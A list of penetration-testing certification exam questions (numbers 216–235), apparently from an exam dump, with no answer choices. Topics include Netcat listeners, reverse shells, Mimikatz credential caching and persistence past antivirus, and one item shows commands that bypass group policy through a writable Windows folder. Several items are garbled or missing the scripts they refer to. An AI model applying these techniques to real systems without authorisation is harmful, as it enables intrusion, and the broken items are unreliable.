Question216: A penetration testing company was hired to conduct a penetration test against Company A's network of 20.10.10.0/24 and mail.companyA.com. While the penetration testing company was in the information gathering phase, it was discovered that the mail.companyA.com IP address resolved to 20.15.1.2 and belonged to Company B.
Which of the following would be the BEST solution to conduct penetration testing against mail.companyA.com?

Question217: A security guard observes an individual entering the building after scanning a badge. The facility has a strict badge-in and badge-out requirement with a turnstile. The security guard then audits the badge system and finds two log entries for the badge in Question: 158

Question218: Black box penetration testing strategy provides the tester with:

Question219: After successfully capturing administrator credentials to a remote Windows machine, a penetration tester attempts to access the system using PSExec but is denied permission. Which of the following shares must be accessible for a successful PSExec connection?

Question220: A penetration tester has compromised a host. Which of the following would be the correct syntax to create a Netcat listener on the device?

Question221: A penetration tester is checking a script to determine why some basic persisting. The expected result was the program outputting "True."
\

Given the output from the console above, which of the following explains how to correct the errors in the script? (Select TWO)

Question222: An individual has been hired by an organization after passing a background check. The individual has been passing information to a competitor over a period of time.
Which of the following classifications BEST describes the individual?

Question223: During an engagement, a consultant identifies a number of areas that need further investigation and require an extension of the engagement.
Which of the following is the MOST likely reason why the engagement may not be able to continue?

Question224: When performing compliance-based assessments, which of the following is the MOST important Key consideration?

Question225: During an engagement an unsecure direct object reference vulnerability was discovered that allows the extraction of highly sensitive PII. The tester is required to extract and then exfil the information from a web application with identifiers 1 through 1000 inclusive. When running the following script, an error is encountered:

Which of the following lines of code is causing the problem?

Question226: During a penetration test, you gain access to a system with a limited user interface. This machine appears to have access to an isolated network that you would like to port scan.
INSTRUCTIONS:
Analyze the code segments to determine which sections are needed to complete a port scanning script.
Drag the appropriate elements into the correct locations to complete the script.

Question227: A penetration tester compromises a system that has unrestricted network over port 443 to any host. The penetration tester wants to create a reverse shell from the victim back to the attacker. Which of the following methods would the penetration tester mostly like use?

Question228: A penetration tester ran the following Nmap scan on a computer
nmap -sV 192.168.1.5
The organization said it had disabled Telnet from its environment However, the results of the Nmap scan show port 22 as closed and port 23 as open to SSH Which of the following is the BEST explanation for what happened?

Question229: A penetration tester is performing a black-box test of a client web application, and the scan host is unable to access it. The client has sent screenshots showing the system is functioning correctly. Which of the following is MOST likely the issue?

Question230: At the information gathering stage, a penetration tester is trying to passively identify the technology running on a client's website.
Which of the following approached should the penetration tester take?

Question231: Place each of the following passwords in order of complexity from least complex (1) to most complex (4), based on the character sets represented Each password may be used only once

Question232: During a penetration test a tester Identifies traditional antivirus running on the exploited server. Which of the following techniques would BEST ensure persistence in a post-exploitation phase?

Question233: During a penetration test, a tester runs a phishing campaign and receives a shell from an internal PC running Windows 10 OS. The tester wants to perform credential harvesting with Mimikatz.
Which of the following registry changes would allow for credential caching in memory?

Question234: A penetration tester executes the following commands:
C:\>%userprofile%\jtr.exe
This program has been blocked by group policy
C:\> accesschk.exe -w -s -q -u Users C:\Windows
rw C:\Windows\Tracing
C:\>copy %userprofile%\jtr.exe C:\Windows\Tracing
C:\Windows\Tracing\jtr.exe
jtr version 3.2...
jtr>
Which of the following is a local host vulnerability that the attacker is exploiting?

Question235: Given the following HTTP response:
http/1.0 200 OK
Server: Apache
Set-Cookie: AUTHID=879DHUT74D9A7C; http-only
Content-type: text/html
Connection: Close
Which of the following aspects of an XSS attack would be prevented?